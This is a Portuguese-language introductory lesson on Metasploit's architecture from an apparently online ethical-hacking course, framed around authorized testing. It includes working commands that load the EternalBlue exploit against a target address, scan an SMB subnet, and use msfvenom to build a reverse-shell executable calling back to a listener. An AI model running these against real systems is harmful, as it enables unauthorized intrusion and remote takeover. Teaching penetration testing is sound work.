Arquitetura do Metasploit
Módulos e console
Arquitetura do Metasploit é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 1 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.
O que é o Metasploit?
Metasploit é a estrutura de exploração mais utilizada. Ela fornece uma biblioteca estruturada de explorações, cargas úteis e ferramentas para testar e demonstrar vulnerabilidades durante trabalhos autorizados.
Em vez de escrever cada ataque do zero, o senhor carrega módulos comprovados, configura-os e os executa por meio de uma interface consistente.
msfconsole
A interface principal é o msfconsole, um shell interativo de linha de comandos. Ele oferece preenchimento automático por tabulação, histórico de comandos e acesso a todos os módulos.
O senhor o inicia em um terminal e então trabalha inteiramente dentro do seu prompt.
msfconsole
# msf6 > helpTipos de módulos
O Metasploit organiza os recursos em tipos de módulos:
- exploit: código que tira proveito de uma vulnerabilidade.
- payload: código executado no alvo após a exploração.
- auxiliary: scanners, fuzzers e ferramentas que não entregam uma carga útil.
- post: ações de pós-exploração em um host comprometido.
- encoder e nop: ajudam as cargas úteis a escapar da detecção.
Nomenclatura dos módulos
Os módulos usam um caminho hierárquico que informa exatamente o que fazem. Ler o caminho revela o tipo, a plataforma e o serviço-alvo.
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploitExplorações versus cargas úteis
Uma distinção importante:
- O exploit é o meio de entrada; ele compromete o software vulnerável.
- A payload é o que o senhor deseja que aconteça depois de entrar, como abrir um shell.
O senhor os combina: uma exploração pode entregar muitas cargas úteis diferentes, dependendo do seu objetivo e do alvo.
O fluxo de trabalho dos módulos
O trabalho com qualquer módulo segue um ciclo repetível:
- faça uma busca por um módulo.
- use-o para carregá-lo.
- defina opções como RHOSTS e LHOST.
- execute-o ou faça a exploração.
Essa consistência explica por que a estrutura pode ser ampliada para milhares de módulos.
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploitArmazenamento de dados e opções
As configurações dos módulos ficam no armazenamento de dados. Cada opção pode ser obrigatória ou opcional.
- RHOSTS: endereço(s) do alvo remoto.
- RPORT: porta remota.
- LHOST: seu endereço de escuta para conexões reversas.
- LPORT: sua porta de escuta.
Use show options para ver do que um módulo precisa antes de executá-lo.
O banco de dados
O Metasploit integra-se a um banco de dados PostgreSQL para armazenar hosts, serviços, espólios e credenciais descobertos durante um trabalho. Isso permite acompanhar um escopo amplo com eficiência.
Inicie-o antes de abrir o console para que os resultados sejam registrados automaticamente.
msfdb init
# Inside msfconsole:
# db_status hosts services credsMódulos auxiliares
Os módulos auxiliary realizam tarefas úteis sem explorar vulnerabilidades: varredura de portas, enumeração de serviços, tentativa exaustiva de logins e fuzzing.
Frequentemente, eles são o primeiro passo, reunindo as informações necessárias antes da seleção de uma exploração.
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
msfvenom é uma ferramenta complementar para gerar cargas úteis autônomas como arquivos: executáveis, scripts ou shellcode que o senhor entrega fora do console.
Ela combina a geração e a codificação de cargas úteis em um único comando, sendo útil para simulações de phishing ou entrega personalizada em testes autorizados.
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exeEspaços de trabalho
Para vários trabalhos, os espaços de trabalho do Metasploit mantêm isolados no banco de dados os hosts, serviços e espólios de cada cliente. O senhor alterna entre eles para que os dados nunca se misturem entre avaliações.
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list allVerificação rápida
Teste sua compreensão dos tipos de módulos.
Recapitulação
O senhor aprendeu a arquitetura do Metasploit:
- msfconsole é a interface principal; msfvenom cria cargas úteis autônomas.
- Tipos de módulos: exploit, payload, auxiliary, post, encoder/nop.
- Os caminhos dos módulos codificam tipo, plataforma e serviço.
- Fluxo de trabalho: buscar, usar, definir opções e executar; as configurações ficam no armazenamento de dados.
- O banco de dados PostgreSQL acompanha hosts, serviços e espólios.
A seguir: como buscar e usar explorações com eficiência.
Perguntas Frequentes
A aula “Arquitetura do Metasploit” é grátis?
Sim — o texto completo de “Arquitetura do Metasploit” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.
O que vou aprender em “Arquitetura do Metasploit”?
Módulos e console Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Ethical Hacking Academy?
Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 1 de 4.
Quanto tempo leva a aula “Arquitetura do Metasploit”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Ethical Hacking Academy?
Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Arquitetura do Metasploit
- Pesquisa e uso de exploits
- Cargas úteis e Meterpreter
- Módulos pós-exploração